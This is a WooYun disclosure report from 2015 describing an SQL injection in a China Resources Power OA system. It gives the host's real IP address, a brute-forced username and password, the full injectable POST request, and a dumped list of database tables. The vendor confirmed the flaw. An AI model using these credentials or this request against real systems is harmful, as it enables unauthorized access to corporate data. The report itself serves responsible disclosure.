当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146162

漏洞标题:华润电力某系统SQL注射(涉及7个库)

相关厂商:华润电力控股有限公司

漏洞作者: 路人甲

提交时间:2015-10-12 18:30

修复时间:2015-11-27 11:16

公开时间:2015-11-27 11:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经确认,细节仅向厂商公开
2015-10-23: 细节向核心白帽子及相关领域专家公开
2015-11-02: 细节向普通白帽子公开
2015-11-12: 细节向实习白帽子公开
2015-11-27: 细节向公众公开

简要描述:

RT

详细说明:

沧州华润电力OA系统
http://221.195.68.213/login.aspx

注入页面.png


爆破出一账号

爆破.jpg


liyong/123456
登陆,其中以页面存在注入

注入页面.png


POST /OA/RecieveDocument/RecDocSearch.aspx HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://221.195.68.213/OA/RecieveDocument/RecDocSearch.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; 
.NET4.0C; .NET4.0E; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 221.195.68.213
Content-Length: 1528
Pragma: no-cache
Cookie: ASP.NET_SessionId=skr3izypbazqyeahfvzzqrrm
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=Tos0dCz2qv3STIwrVBE98n6Bf8ST6oq8%2BZrJR2IhVNoD%2FIkMnddsGBMmhE8fYAN4DIkeMaDhlkpvTJJ3PKnLWr
%2FhKT3I55SvVpjP5tNw6VArR9dQStrEyJAGQK8O%2F7ohOC5BjLnBYN9rC40Puj26QVY%2FLEZDoz9CcihwAKLJnpHKxUx2BAMIGW6Ophe438Wb1a71McC4eVCfCfOm%2BbNXfIAO%2FtB2bQQkcKHvpI
%2FGjrxLw1yOpesduP4nE28wEhKr1vJX6WOJsTh3kfH7EO01NX4HJBKXetjItqNVxKhzV1dXlcZkx%2FVvE7W%2BDx7mwGYZC
%2BBKLPxRDjFfxu1kKWnOXjFXC6KBCguh1sZOgJ3GyJaeBxrKvbLsHk6GwczHhGdk8Puiifzh47AURaV2BUzom6LKLYTF%2B9pr%2FA2FaWHCxgPcXvHApUXiSZPCeEq0KR7Ir7nj19WJXHt45tUZHPKKmkseu6aP8ZCjclgwCQ
%2FlsVjDSFbWVb2cwukXaP46Qrd2QvAYaCifW69%2FgHrj9iCZkLuFqL3lf7tOaUoKYtypYETMQh1E4UUboeOyHUAZShdDs7yjvq26cBUPH
%2BWeOgkGuKYszxXhdpLUne5rMJ11Uf8wpRQQDTlbXeUqfpXrKN9vnMcBADlBnaR91uAKG8STXztF9fG9PMZ4iOy%2FhDLOXG23YigDmzoqP18mk4ZWHny6T7ONliw2lthMO3%2Bj%2Ff3DL2i%2FyOrmz
%2BlemHNvp9We5Umlkjc1Btdrda8dqypIfWJjjOsmuiylCaW%2BNvcvebCxJOxZHlOc45wURkuqvvNhPfU%2BYr52MIbxp8VpC7dIydYB3xzy0%2FZqg4xSK2uTvLR%2Bk25p1WbZ7Yu9TurQKDqtMfjWE
%2BIc7UAfqQoE1lzyrKR8&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=epcmmmp21wwupoSEIsrnqRMyi5P1i78G%2B7md87OV3UL6%2FO61d4nM%2FnzNjIGYl47FY8OPBPpc9Ay0yuSlUXA
%2FCWopoJ0nDayzxa2cuwNhDrz
%2FQAwEt3oajU3OqLgQDeN7vhTzYBLnu92ikJtZ69eVRLJPVotcBGTqu2lvKPCwBKrOaRg10qe0Wvk8elkaRZ33z0bf6AxzlwXEtqShzTQEU2N0nvxKThJqObZuoiFZyw6s83KHPyNQbUhjBiRZP2CUQ5naKW7lMkYWGUCyydSICjZP
9uMhChdSTC5B5KYbQ04%3D&txtRecDocTitle=123*&ddlPigeonholeType=&txtBelongToCompany=&txtNum=&DateRange1%3ArdbSearch=month&DateRange1%3AddlYear=2014&DateRange1%3AddlMonth=10&btnEx
ecute=%B2%E9%D1%AF


txtRecDocTitle存在注入

漏洞证明:

7个库

7个库.png


77个表
Database: oa
[77 tables]
+----------------------------+
| BASE_MAILMESSAGE |
| Base_BussinessData |
| Base_Button |
| Base_DataControlInfo |
| Base_Flow |
| Base_FlowBiz |
| Base_Group |
| Base_GroupMember |
| Base_LoginLog |
| Base_ManageRelation |
| Base_Menu |
| Base_OperationImpower |
| Base_OperationLog |
| Base_Org |
| Base_OrgMaintanceImpower |
| Base_OrgMember |
| Base_PasswordHistory |
| Base_PasswordPolicy |
| Base_Task |
| Base_TaskMessage |
| Base_User |
| CheckINFO |
| CheckINFOList |
| DrawDetails |
| DrawOM |
| InStock |
| LO_Article |
| LO_Function |
| LO_NetStorage |
| LO_UserFunction |
| LO_yqLink |
| MeetRequest |
| MeetingRoom |
| OA_ApplyGather |
| OA_Assess |
| OA_AssessCommunicate |
| OA_AssessCommunicateDetail |
| OA_AssessCommunicateItem |
| OA_AssessStat |
| OA_AuditingOpinion |
| OA_Compact |
| OA_CompactPayment |
| OA_Deputy |
| OA_DocContent |
| OA_EachAssessDetail |
| OA_GatherRelation |
| OA_MonthConsume |
| OA_News |
| OA_ReceiveDocument |
| OA_Salary |
| OA_Scheduling |
| OA_SchedulingAccessControl |
| OA_SelfAssessDetail |
| OA_SelfAssessItem |
| OA_SelfAssessResult |
| OA_SendDocument |
| OA_SignMessage |
| OA_TakeInDetail |
| OA_TakeInMain |
| OA_TakeInPlan |
| OA_TestAssess |
| OA_TestAssessDetail |
| OA_TrainAssess |
| OA_WorkingDiary |
| OA_WorkingPlan |
| OA_WorkingPlanDetail |
| OA_WorkingPlanItem |
| OA_WorkingPlanItemAnnex |
| OfficeCatalog |
| OfficeM |
| OutStock |
| Stock |
| StockTrans |
| dtproperties |
| hua$ |
| sysconstraints |
| syssegments |
+----------------------------+
不在深入了

修复方案:

过滤参数

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-13 11:14

厂商回复:

感谢提交

最新状态:

暂无

漏洞评价:

评价